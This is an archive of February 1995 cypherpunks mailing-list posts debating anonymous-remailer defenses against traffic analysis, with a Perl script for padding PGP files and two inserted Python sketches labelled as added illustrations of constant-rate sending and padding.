> largest.  Match the next largest.  Match the next largest. Pull & log.
Encryption with padding between nodes would protect against size
matching, I agree.  But it is the padding which is important, not the
encryption.

> Get stuck?  Need a hint?  Resend a message.  Watch for the repeat on the
> out.
That's why Chaum identified one of the main features of a remailer being
that it would reject duplicates.  Mixmaster does some version of this,
although that needs improvement to really meet this attack.

> Alice has been hauled into court.  The Feds claim that she is the one that
> actually sent messages M1,...Mx to Bob through Chaum, even though these
> messages have varied From: (and From) lines.  As root, she cannot claim
> that this is not possible.  OTOH, if Chaum requires a match, the Feds would
> have to claim that she compromised the secret keys of all the
> corresponding From: addresses.  Much tougher.

OTOH, if Alice actually has signed those messages, her jig is up pretty
good, wouldn't you say?  Do we really want to force people to use the
nets in a mode in which they can be incriminated like this by a hostile
government?

> Seriously, if a site is being shadowed, then it is insecure.  It is to our
> advantage to know this.  You are right that we "don't care" where a message
> comes from only if we assume that the message _didn't_ come from an LEA.
> (Or a big corporation.  Some of them probably have the power to do this,
> too.)

Hell, Detweiler has the power to do this!  He's spoofed messages plenty
of times.  How do we know?  Because of remailer logging.  That's the real
threat, IMO (the logging).

> If it did, then the remailer net is under attack, and we most
> definitely _do_ care about that.

Even if a message comes from a fake address that is hardly evidence of an
attack by a powerful opponent.  It could just be an extra-paranoid
legitimate remailer user who doesn't want to extend any more trust than
necessary.

> >Although I agree with Wei Dai's mathematics, to my mind it points up the
> >importance of successful countermeasures rather than implying that the
> >remailer network is inherently insecure.  For example, if you send one
> >identical message every batch, Wei's math shows clearly that you can't be
> >traced.  Let's not get rumors started about how the remailers don't
> >work.
>  
> I'm lost here.  I thought that sending an identical message (producing
> identical output) every tick would be the equivalent to an attack.

I meant to refer to encrypted messages identical in size and otherwise
opaque, so that your apparent rate of output is constant.

> But what exactly constitutes "successful countermeasures"?  How do you
> prevent an attacker from taking over a site, thus compromising it, w/o
> the knowledge of the operator?  How do you prevent long/short matching of
> the remailer net _as a whole_?  How do you prevent tail matching?  How do
> you prevent middle matching, for that matter?  How do you prevent the
> repeated message attack?

I was referring specifically to the correlation attack described by Wei.
The other attacks you describe need to be met by the kinds of
countermeasures we have been discussing: standard-sized messages,
remailer chains, not using encrypted reply blocks which leave message
bodies alone, rejecting matching messages.  All of these were discussed
in Chaum's 1981 paper.

> >Do you see your suggestion as protecting against Wei's in/out correlation
> >attack?  
>  
> Yes!  Well, not by itself.  My suggestions about "rational use of garbage"
> do that.  If Bob receives x messages each tick, 0 to x of which are real,
> Eve is hosed--if all messages are standard sized & encrypted!.  Eve is even
> more hosed if the x messages are concatenated & superencrypted.  If Alice
> sends y messages each tick, Eve is hosed.  Even more so if the messages are
> concatenated & superencrypted.

How can Bob arrange to receive a constant number of messages each tick?
Do all his messages come from one remailer?  Or do all of the remailers
which might send to him check among themselves before sending to him so
they can mutually know how many fake messages to send?

IMO the real solution to the correlation attack is to have a constant
message generation rate.  That is sufficient.  Solutions to the other
attacks mentioned in Chaum are described in Chaum.  (This attack was not
described in Chaum's paper.)

> >Of course it was Chaum himself in his 1981 paper (which I think is available
> >from the CP FTP site) who described the duplicate-message attack.  I don't
> >see that inter-remailing encryption helps much, because the attacker can
> >still notice that whenever they inject message A, _something_ goes to
> >Bob.  The real solution, as Chaum pointed out, is that the remailer must
> >reject duplicate messages, even when separated by days.  Doing this without
> >keeping a database of all messages ever sent is left as an exercise.
> >
>  
> I disagree.  If identical input to Chaum does not produce identical output
> to Bob, how does Eve correlate them?  Repeating, she can match the top of
> the body of messages, so random tails reveal the actual encrypted message,
> for whatever that is worth.

I'm not sure what you mean by "matching the top of the body of messages".
Are you referring to an encrypted reply block, which might be the same
for two different messages to the same user?  Or are you suggesting that
messages would have some headers or some other structures at their top
which would be preserved through a remailer?

> And if Bob receives x packets per tick, or a BIG packet every tick, how does
> Eve trace it?

If the input to Bob really can be made constant across the whole remailer
net then this does seem to largely protect against duplicate-message
insertion, in conjunction with the intra-remailer encryption.  However it
would apparently also be necessary for every remailer to send a constant
number of packets to every other remailer.  Otherwise a bolus of
duplicates into one remailer would all leave to go to the next remailer
at once and would show up.  This means that the net as a whole has to
carry a constant traffic load on all inter-node links, which could mean a
large cost in bandwidth load.  I still think that rejecting matching
messages is a better solution.

> >Another aspect worth mentioning is that message splitting can make the
> >kinds of statistical correlations that Wei Dai was looking at more of
> >a danger. 
>  
> More than being the ONLY file in the net of your (approximate) size?

No, of course message size standardization is a necessary step.  This has
been recognized for 15 years.

> >          It's one thing if I send a message along with thousands of
> >other people, and Bob gets a message along with everyone else.  But if I
> >send 10 messages and Bob gets 10 from that batch, that fact alone can
> >help to link us up.  So splitting my big message into 10 standard ones
> >isn't that great if they're all sent at once.  Ideally you'd want to
> >dribble them out at some standard rate, a rate at which you always send
> >a message whether you have something to send or not.  But this may introduce
> >unacceptable latency.
>  
> "Dribble them out at some standard rate".  Yes.  y packets per tick.  Set y
> equal to your average number of real packets per tick, plus 3 standard
> deviations.  Since you are chaining, the latency of your input will be less
> than the latency of the remailernet.

OK, but chances are your average number of real packets per tick is < 1,
e.g. if a tick is a few hours and you only send one or two messages
a day.  So when you do need to send that 500KB GIF it's going to take a
lot of ticks.

I would sum up by agreeing with several points: the need for standard
message sizes, and for a standard rate of message output.  I am neutral
on whether a remailer may want to super-encrypt a message to the next
link in the chain (whether a remailer or an end user) if it happens to
have a key handy.  I don't see any harm in this and the remailer
software will already handle this transparently on the receiving end.
I disagree with the idea of remailers checking signatures.  I don't
agree that inter-node remailer encryption provides significantly more
protection than padding.  I think that encrypted reply blocks are
unsafe even with inter-node remailer encryption.  See Chaum's paper for
ways that encrypted reply blocks can be used safely.  We have also had
some suggestions here for modifications to Chaum's method.  And I don't
see how you can arrange to receive a constant load from the net without
a highly centralized system, which would have its own dangers.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzCGHRnMLJtOy9MBAQEzlwH/XUYi0mhSUl0Dd4hMp/dE9KFEDQd3jNQs
Zby7ZIDl3qQn1EK1f81pLSHUYdQgGflMrMaDS9QTrRXSR/mYqx3HeQ==
=ZyWU
-----END PGP SIGNATURE-----
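
The constant-rate sending debated in this exchange ("y packets per tick", standard message sizes, and the latency cost of a 500KB file), as an added Python sketch that is not code from the thread. The cell size, the in-cell header layout and all names are assumptions; the encryption that would keep an observer from telling dummy cells from real ones is left out.

```python
import math
import os
import statistics
from collections import deque

# Assumptions for this sketch (none of these values come from the thread):
CELL_SIZE = 10 * 1024   # standard message size in bytes
HEADER = 5              # 1 type byte + 4-byte payload length, inside the cell
REAL, DUMMY = 1, 0      # type byte; would sit inside the encrypted part


def choose_rate(real_per_tick):
    """y = mean + 3 standard deviations of real packets per tick, at least 1."""
    mean = statistics.mean(real_per_tick)
    sd = statistics.pstdev(real_per_tick)
    return max(1, math.ceil(mean + 3 * sd))


def split_into_cells(message):
    """Split a message into fixed-size cells; the last one is filled with random bytes."""
    cap = CELL_SIZE - HEADER
    cells = []
    for off in range(0, len(message), cap):
        chunk = message[off:off + cap]
        filler = os.urandom(cap - len(chunk))
        cells.append(bytes([REAL]) + len(chunk).to_bytes(4, "big") + chunk + filler)
    return cells


def dummy_cell():
    """A cell with no payload, the same size as a real one."""
    return bytes([DUMMY]) + (0).to_bytes(4, "big") + os.urandom(CELL_SIZE - HEADER)


class ConstantRateSender:
    """Emits exactly `rate` cells on every tick, whether or not there is real traffic."""

    def __init__(self, rate):
        self.rate = rate
        self.queue = deque()

    def submit(self, message):
        self.queue.extend(split_into_cells(message))

    def tick(self):
        return [self.queue.popleft() if self.queue else dummy_cell()
                for _ in range(self.rate)]


def reassemble(cells):
    """Receiver side: drop dummies, strip filler, join real payloads in order."""
    out = bytearray()
    for cell in cells:
        if cell[0] == REAL:
            n = int.from_bytes(cell[1:5], "big")
            out += cell[5:5 + n]
    return bytes(out)


def ticks_to_send(message_len, rate):
    """Ticks needed to push one message of message_len bytes through the sender."""
    cells = math.ceil(message_len / (CELL_SIZE - HEADER))
    return math.ceil(cells / rate)


if __name__ == "__main__":
    history = [0, 0, 0, 1, 0, 0, 0, 1]   # constructed: real packets seen per tick
    y = choose_rate(history)
    print("rate y =", y, "cells per tick")
    print("ticks for a 500KB file:", ticks_to_send(500 * 1024, y))
```

With a tick of a few hours, the tick count printed for the 500KB case is the latency objection raised in the reply.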




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 20:35:08 PST
To: jltocher@CCGATE.HAC.COM
Subject: Re: Clipper Revived?
In-Reply-To: <9501017916.AA791667001@CCGATE.HAC.COM>
Message-ID: <199502020434.XAA04359@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      From Edupage:
>      
>      REPLACEMENT FOR CLIPPER
>      AT&T and VLSI Technology Inc. will collaborate to develop microchips 
>      that use a triple-strength version of DES (data encryption standard), 
>      which previously had been rejected by the National Security Agency. 
>      VLSI is the designated contractor to make the government-favored 
>      Clipper chips, but this latest announcement reveals their doubts over 
>      whether there's a market for the Clipper. "These companies have 
>      basically made the determination that Clipper is dead and there's 
>      going to be the proliferation of encryption anyway, so they might as 
>      well take advantage of it," says one observer, who predicts the market 
>      for such technology "could reach hundreds of millions" of dollars in 
>      annual sales by the end of the decade. (Wall Street Journal 1/31/95 
>      A3)

So, the question is, are these chips escrowed like Clipper (ie, are they
abandoning the standard because the phones are awful)? Or are they abandoning
the escrowed encryption altogether?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 1 Feb 95 20:48:07 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Fundamental Question?
In-Reply-To: <199502020400.XAA03916@libws2.ic.sunysb.edu>
Message-ID: <9502020446.AA06471@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 1 Feb 95 23:00:18 EST
    From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>

    Well, it's happened in the past. Doesn't mean Usenet is perfect for it,
    since nobody wants to sift through several thousand messages a day for
    messages encrypted to him/her.

It's easy to automate and you are incorrect in saying that nobody does
it.  alt.anonymous.messages was created as an implementation of an
anonymous message pool.  I wouldn't go so far as to say that it's
perfect, but it's simple and it works.  If you post a message
encrypted for my public key and include my name and/or my key id in
the subject, I'll get it.  And, no, I'm not the only one who uses it.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 2 Feb 95 06:09:53 PST
To: cypherpunks@toad.com
Subject: Frothing remailers and trust
Message-ID: <199502020934.AA25847@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

kevin@elvis.wicat.com writes:

> It strikes me as critical; right now, a user has to choose to trust a
> set of remailers, given no assistance other than a list of "reliable"
> ones. Given an extended web of trust between remailers, the user can
> choose to trust one remailer (I have no idea how to make this process
> more palatable) and immediately gain the security of a large web of
> remailers (maybe you are right about that instant gratification
> thing...)

For what it's worth, I'm a remailer operator and I don't know any of
the other operators well enough to say that I'm sure that they're
trustable with respect to preserving privacy. (no offense intended.) 
I do, for the most part, trust them to forward almost all messages
but my conclusion is based in large part on Raph's list. Absent that
list, I don't think I'd have enough information on delivery reliability
to comment about that either. This "web of trust" thing sounds nice but
I can't participate because I don't know the other people involved. I 
think other remailer operators may be in a similar situation.

Your scheme seems to conflate two tasks/roles I think are separable -
remailing messages and specifying a trustable path for messages to 
take. The latter requires more information than I have - but it is
information someone could gather. I think it'd be possible for someone
to perform "remailer audits", and then report their findings. Some
part of that report might be in the form of an "Anon-To:" chain,
or probabilities for creating your own chain of messages; or maybe
the auditor would serve as a first-hop-but-never-the-last remailer,
passing the message along to remailers it believes to be reliable and
trustworthy. Premail seems to be a step in this direction, but it
chooses hops on the basis of reliability, not reliability + privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzCm8X3YhjZY3fMNAQEjnwP/T//KwPuvnzlRYgV8MgltJIaisM78zMjU
J+Q+ARuvBudBS9ah8Z2p/MtxClj6nBYXEMFWtqwQbICBzDwxfpQAwahz5Vlay3qi
QouRKx0ZJonvdi1LpIYYS8ElH8SdWEERMItfDyFDe2HDjFTXjL6fUbrIyLBvdzdl
PCSmID/WYq0=
=ukpf
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 06:45:22 PST
To: cypherpunks@toad.com
Subject: Remailer encryption module
In-Reply-To: <Pine.3.89.9502011857.B8923-0100000@jake.bga.com>
Message-ID: <199502021444.GAA07493@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nathan Zook <nzook@bga.com>

   I also believe that hacking PGP is a bad thing (tm), because it means that
   every time an upgrade comes out, it will need to be re-hacked, and once you
   start hacking, when do you stop?

I agree.  PGP just does not have the support for the encryption
required for mixing remailers.  These deficiencies have been known for
about two years at this point and still nothing has happened.  I
expect this not to change anytime soon.

That means that we have to replace PGP as the encryption module for
remailers.  The first thing to do is to design a data format which
supports what the remailers need now, and nothing speculative.  Since
this data format has a single purpose, we can make new revisions more
easily than for a general purpose package.

Once we get a data format, implementations will follow.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 08:36:40 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
In-Reply-To: <Pine.3.89.9502011857.B8923-0100000@jake.bga.com>
Message-ID: <199502021635.IAA07634@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nathan Zook <nzook@bga.com>

   When I say that the Mark I remailers are laughably easy to crack, I mean
   laughably easy.

By whom?  I am hearing a general denunciation of the current remailer
system.  These blanket denials are false on their face, because they
are not true in every circumstance.

   The only reason that our systems are actually able to do any good is that
   our threat model _is not_ an LEA--with government resources, and government
   patience.

_Our_ threat model?

There is not one threat model.  Each person has their own threat model
and their own desired level of security.  An individual also desires
more security for some messages than others.  The current remailer
network is good for some purposes and bad for others.

Every evaluation of security _must_ include the nature of the security
desired, because there is no single concept called "security" which is
the same in every situation.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 08:48:23 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <9502021453.AA28522@snark.imsi.com>
Message-ID: <199502021647.IAA07663@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   > Once we get a data format, implementations will follow.

   The obvious data format is MIME's "Security Multiparts".

That's not a complete answer.  That's kind of the obvious package, but
it addresses nothing of the interior.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 08:49:39 PST
To: cypherpunks@toad.com
Subject: Adding padding to PGP files
Message-ID: <199502021648.IAA05417@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are a couple of perl scripts I wrote last year to add padding to PGP
encrypted files.  The usage would be:

perl pgppadt.pl filename bytestoadd

The output file is filename.pad.

It only works on binary ".pgp" public-key encrypted files (not ascii armored
files).  So there would be some work needed to make it a really useful tool.
It would also be better to use a strong source of random numbers.  I
think Carl Ellison recently posted some tools that could help with this.
The two files are pgppad.pl, which does the work, and pgppadt.pl, a very
simple test driver to show how to use it.  They are in a shar archive.

Hal

---------------cut here----------------
#!/bin/sh
# to extract, remove the header and type "sh filename"
if `test ! -s ./pgppad.pl`
then
echo "writing ./pgppad.pl"
cat > ./pgppad.pl << '\End\Of\Shar\'
# Perl module to allow padding and some other manipulation of PGP
# files.
#
# Include this with the statement:
# require 'pgppad.pl'
#
# 10/16/93
# Hal Finney


# Read a PGP Cipher Type Byte and the following length.
# One argument: file to read from
# Returns several things, in this order:
# CTB, with the length information removed, as a number.
# Length of following packet.
# Name of this kind of packet, made up, see list below.
# Packed CTB/length packet, suitable for writing out.
# Returns an empty string on error.
sub read_ctb {
    local($file) = @_;
    local($ctb, $length, $name, $rctb, $rlength, $lengthlength);

    if (read ($file, $rctb, 1) != 1) {		# Raw ctb
	return "";
    }
    $ctb = unpack ("C", $rctb);
    if ($ctb < 128) {
	return "";		# Must have high bit set
    }
    $lengthlength = $ctb % 4;
    $ctb -= $lengthlength;
    if ($lengthlength == 0) {
	$lengthlength = 1;
    } elsif ($lengthlength == 1) {
	$lengthlength = 2;
    } elsif ($lengthlength == 2) {
	$lengthlength = 4;
    } else {
	$lengthlength = 0;
	$length = -1;	# Unknown length
    }
    if (read ($file, $rlength, $lengthlength) != $lengthlength) {
	return "";
    }
    if ($lengthlength==1) {
	$length = unpack("C", $rlength);
    } elsif ($lengthlength==2) {
	$length = unpack("n", $rlength);
    } elsif ($lengthlength==4) {
	$length = unpack("N", $rlength);
    }
    $rctb .= $rlength;	# Raw CTB byte followed by the raw length bytes
    if ($ctb==0x84) {
	$name = "pubkey header";
    } elsif ($ctb==0x88) {
	$name = "signature";
    } elsif ($ctb==0x8c) {
	$name = "message digest";
    } elsif ($ctb==0x94) {
	$name = "secret key";
    } elsif ($ctb==0x98) {
	$name = "public key";
    } elsif ($ctb==0xa0) {
	$name = "compressed";
    } elsif ($ctb==0xa4) {
	$name = "conventional encrypted";
    } elsif ($ctb==0xa8) {
	$name = "plaintext";
    } elsif ($ctb==0xb0) {
	$name = "trust";
    } elsif ($ctb==0xb4) {
	$name = "user id";
    } elsif ($ctb==0xb8) {
	$name = "comment";
    } else {
	return "";
    }
    return ($ctb, $length, $name, $rctb);
}

# Write a CTB and length field out.
# 3 arguments: file handle, ctb value, and length in bytes.
# No return value.
# Length gets output as 1, 2, or 4 bytes, the smallest in which it
# will fit.
# If length is negative we output no length field, but an "indefinite
# length" code is added to ctb.
sub write_ctb {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	$rctb = pack ("C", $ctb+3);		# Packed data
    } elsif ($length > 65535) {
	$rctb = pack ("C N", $ctb+2, $length);  # Packed data
    } elsif ($length > 255) {
	$rctb = pack ("C n", $ctb+1, $length);  # Packed data
    } else {
	$rctb = pack ("C C", $ctb+0, $length);  # Packed data
    }
    print $file $rctb;
}

# This entry point always outputs a 4-byte count.  Length must be > 0.
# Otherwise like write_ctb.
sub write_ctb_4 {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	die ("write_ctb_4 called with negative length\n");
    }
    $rctb = pack ("C N", $ctb+2, $length);  # Packed data
    print $file $rctb;
}


# Pad a PGP public-key-encrypted file to the specified length.
# Arguments: input file handle; output file handle; new size.
# Returns negative value on error.  See the code for what the
# different values mean.
# Returns 0 on success.
sub pgppad {
    local($infile, $outfile, $size) = @_;
    local($ctb, $len, $name, $rctb, $insize, $buf, $data);

    # Read ctb & length of pubkey header
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -1;	# Error
    }
    if ($name ne "pubkey header") {
	return -2;	# Error
    }
    if ($len < 0) {
	return -3;	# Error
    }

    $insize = length($rctb) + $len;

    # Read packet of pubkey header
    if (read ($infile, $data, $len) != $len) {
	return -3;
    }

    # Write out pubkey header, unchanged
    &write_ctb($outfile, $ctb, $len);
    print $outfile $data;

    # Read ctb and length of conventional packet
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -4;	# Error
    }
    if ($name ne "conventional encrypted") {
	return -5;	# Error
    }

    # Calculate size of outgoing conventional packet.
    # Assume rctb won't change size; it may grow by 1 or 2 in some
    # rather rare cases, in which case we'll be a byte or two too big.
    $size -= $insize + length($rctb);
    if ($size < $len) {
	return -6;	# Error
    }

    # Output CTB with new length
    &write_ctb_4($outfile, $ctb, $size);

    # Copy remainder of input file
    while (read ($infile, $buf, 32768)) {
	print $outfile $buf;
    }

    # Note that this random number generator is probably not
    # cryptographically strong.
    srand (time|$$);
    while ($len < $size) {
	print $outfile pack ("C", int(rand(256)));
	++$len;
    }

    return 0;		# Success
}

1;	# Non-zero return for 'require'
\End\Of\Shar\
else
  echo "will not over write ./pgppad.pl"
fi
if `test ! -s ./pgppadt.pl`
then
echo "writing ./pgppadt.pl"
cat > ./pgppadt.pl << '\End\Of\Shar\'
# Test program for pgppad.pl, showing how to use it.
require 'pgppad.pl';

open (IN, $ARGV[0]) || die ("Couldn't open $ARGV[0]\n");
open (OUT, ">$ARGV[0].pad") || die ("Couldn't create $ARGV[0].pad\n");
binmode (IN);	# PGP files are binary; this matters on non-Unix systems
binmode (OUT);

$padding = $ARGV[1];

@stat = stat(IN);
$size = $stat[7];
print "Input file $ARGV[0] has size $size bytes\n";
# Parenthesize the sum: "." and "+" have equal precedence in Perl
print "Output file $ARGV[0].pad will have size ".($size+$padding)." bytes\n";

if (($code = &pgppad (IN, OUT, $size+$padding)) < 0) {
    die ("pgppad returns code $code\n");
}

close (IN);
close (OUT);
print ("Done\n");

\End\Of\Shar\
else
  echo "will not over write ./pgppadt.pl"
fi
echo "Finished archive 1 of 1"
exit
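
The same padding step as an added Python sketch, not part of the post above: it extends the length field of the conventional-encrypted packet and appends random bytes, but sizes the packet from the 5-byte header it actually writes, so the output hits the requested size exactly (the case the script's comment says can come out a byte or two too big), and it draws the padding from the OS random source. Function names and the sample input are assumptions; the CTB values are the ones listed in pgppad.pl.

```python
import os
import struct

PUBKEY_ENC = 0x84   # "pubkey header" CTB, as named in pgppad.pl
CONV_ENC = 0xA4     # "conventional encrypted" CTB
LEN_FIELD = {0: 1, 1: 2, 2: 4}   # low two CTB bits -> bytes in the length field


def read_packet(buf, pos):
    """Return (ctb_without_length_bits, header_len, body_len) for the packet at pos."""
    if pos >= len(buf) or buf[pos] < 0x80:
        raise ValueError("no CTB (high bit set) at offset %d" % pos)
    code = buf[pos] & 3
    if code == 3:
        raise ValueError("indefinite-length packets are not handled here")
    n = LEN_FIELD[code]
    raw = buf[pos + 1:pos + 1 + n]
    if len(raw) != n:
        raise ValueError("truncated length field")
    return buf[pos] & 0xFC, 1 + n, int.from_bytes(raw, "big")


def pad_to_size(data, target):
    """Pad a binary public-key-encrypted file to exactly `target` bytes."""
    ctb1, hdr1, body1 = read_packet(data, 0)
    if ctb1 != PUBKEY_ENC:
        raise ValueError("first packet is not a pubkey header")
    start2 = hdr1 + body1                      # offset of the second packet
    ctb2, hdr2, body2 = read_packet(data, start2)
    if ctb2 != CONV_ENC:
        raise ValueError("second packet is not conventional encrypted")
    body_start = start2 + hdr2
    if body_start + body2 != len(data):
        raise ValueError("packet length does not match file size")
    # The rewritten header is always CTB + 4-byte length = 5 bytes,
    # whatever the input used, so size the new body from that.
    new_len = target - start2 - 5
    if new_len < body2:
        raise ValueError("target size too small for this file")
    header = bytes([CONV_ENC | 2]) + struct.pack(">I", new_len)
    padding = os.urandom(new_len - body2)      # OS random source for the padding
    return data[:start2] + header + data[body_start:] + padding


def make_sample():
    """Constructed stand-in for a .pgp file: two packets with 2-byte length fields."""
    pk = bytes([PUBKEY_ENC | 1]) + struct.pack(">H", 140) + bytes(range(140))
    conv = (bytes([CONV_ENC | 1]) + struct.pack(">H", 300)
            + bytes(i % 251 for i in range(300)))
    return pk + conv


if __name__ == "__main__":
    sample = make_sample()
    padded = pad_to_size(sample, 1024)
    print(len(sample), "->", len(padded), "bytes")
```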




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Thu, 2 Feb 95 07:04:00 PST
To: cypherpunks@toad.com
Subject: How much entropy in a key press?
Message-ID: <199502021456.IAA01951@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone tell me how many bits of entropy there are per 7-bit ASCII
character.  More specifically, a program wishes to generate a session
key by prompting the user to type N random key presses.  The characters
entered are hashed down to 128 bits by MD5 for subsequent use as a key.

What should the value of N be, such that the entropy of the user's
string does not unnecessarily exceed the entropy of the hash?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allan Bailey <allan@elvis.tamu.edu>
Date: Thu, 2 Feb 95 07:08:49 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <199502021444.GAA07493@largo.remailer.net>
Message-ID: <9502021508.AA28912@elvis.tamu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>    From: Nathan Zook <nzook@bga.com>
>    I also believe that hacking PGP is a bad thing (tm), because it means that
>    every time an upgrade comes out, it will need to be re-hacked, and once you
>    start hacking, when do you stop?

Sounds like the UNIX philosophy to me.  :) 

> I agree.  PGP just does not have the support for the encryption
[...]
> That means that we have to replace PGP as the encryption module for
> remailers.  The first thing to do is to design a data format which
> supports what the remailers need now, and nothing speculative.  Since
> this data format has a single purpose, we can make new revisions more
> easily than for a general purpose package.
> 
> Once we get a data format, implementations will follow.

Isn't this what the forthcoming PGP RFC is about?  Also, what about
the PEM "standard"?  If remailers agree to follow one or more of those
standard data format specifications, then someone could just
rip up PGP and implement modules to produce those data formats.

Consider what CP did with his(her?) PGPTools kit.  As long as we have
an agreeable dataformat "standard", the implementation becomes
irrelevant.  

Maybe I'm just confused and not following the thread closely
enough....

- --
Allan Bailey, allan@elvis.tamu.edu        | "Freedom is not free."  _O_
Senlima Diverseco je Senlimaj Kombinajxoj.| allan.bailey@tamu.edu    |
KC5KSF                                    |nefud-the-delirious@tamu.edu
GCS w+ v-/+ C++++ U@$ P+++ L++ E++ N++ po--- Y++ b++

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzD1ghDxfDCMTq7JAQH9SgQA1K0i/PndcdaZFHkRwP2IrWbMihXvCTRc
0G0xf3GUH4KLlR5HC/qUBurvreoRCF2PjM6cDpx1Ao2pRbB/jeiRINC/5OuhZtrJ
A1KpWN51XR2c4BXRTxXvNGCUMzzH7B8uLjR01n3EWabHljoKX8HHwWKKXTe5S/1Q
AQlh00/0iA0=
=+b0t
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 09:46:29 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
Message-ID: <199502021745.JAA10726@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger" <perry@imsi.com>
> Eric Hughes says:
> > 
> > Once we get a data format, implementations will follow.
> > 
> 
> The obvious data format is MIME's "Security Multiparts".
> 
> Perry

For those wishing to follow this debate, here is a URL for this document:

<URL:http://info.internet.isi.edu/in-drafts/files/draft-ietf-pem-sigenc-03.txt>

I had trouble finding it since the filename does not contain "mime" or
"security".

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 2 Feb 95 06:53:24 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailer encryption module
In-Reply-To: <199502021444.GAA07493@largo.remailer.net>
Message-ID: <9502021453.AA28522@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> 
> Once we get a data format, implementations will follow.
> 

The obvious data format is MIME's "Security Multiparts".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 2 Feb 95 08:18:34 PST
To: mcip@mcfeeley.cc.utexas.edu
Subject: Video encryption & QTC
Message-ID: <199502021617.AA27746@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ for cypherpunks: Apple's now beta testing a video conferencing
product called QuickTime Conferencing, or QTC. The Mac crypto
interface list (mcip@feeley.cc.utexas.edu) started a discussion on
video encryption, hence this crosspost. Feel free to chime in. ]

Here are a couple of additional things to consider.

This is a pretty classic application for stream ciphers. Since QTC is
transport-independent (and I'd bet it's using OpenTransport calls,
too), I'm assuming that QTC is using streams for video data, and that
any packetization happens at the transport layer. Just before you call
UDPSend(), ATPSend(), or whatever, just whack that outgoing block
through the crypto function and off you go.

As mentioned, RC4 might be a good choice. It's fast, plus Apple's
already licensed it. It probably provides adequate tactical security,
but as Adam pointed out, it has not been well analyzed in the open
literature. However, there are many other stream ciphers out there:
Diamond, Blowfish, RC5, etc. My gut feel is that RC4 is probably
adequately secure with a 128-bit key; then Apple can dumb down to 40
bits for export approval. After all, they're not likely to build a
product which they can't export.

What about using a PCMCIA card like the National Semi Persona 100? It
includes RSA signatures & verification, Diffie-Hellman key exchange (I
think) and single DES; future versions will include 3DES and IDEA.
Hardware encryption is fast, fast, fast. Don't forget AT&T's recent
announcement of a similar product which does 3DES.

One MCIP reader proposed just using PGP: RSA the session key and send
it along. IMHO Diffie-Hellman is a better way to do this. Rather than
using the PGP metaphor, where RSAing the session key allows you to
send the session key as part of the message, DH allows you to
establish the session key over an insecure channel, then start sending
messages.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

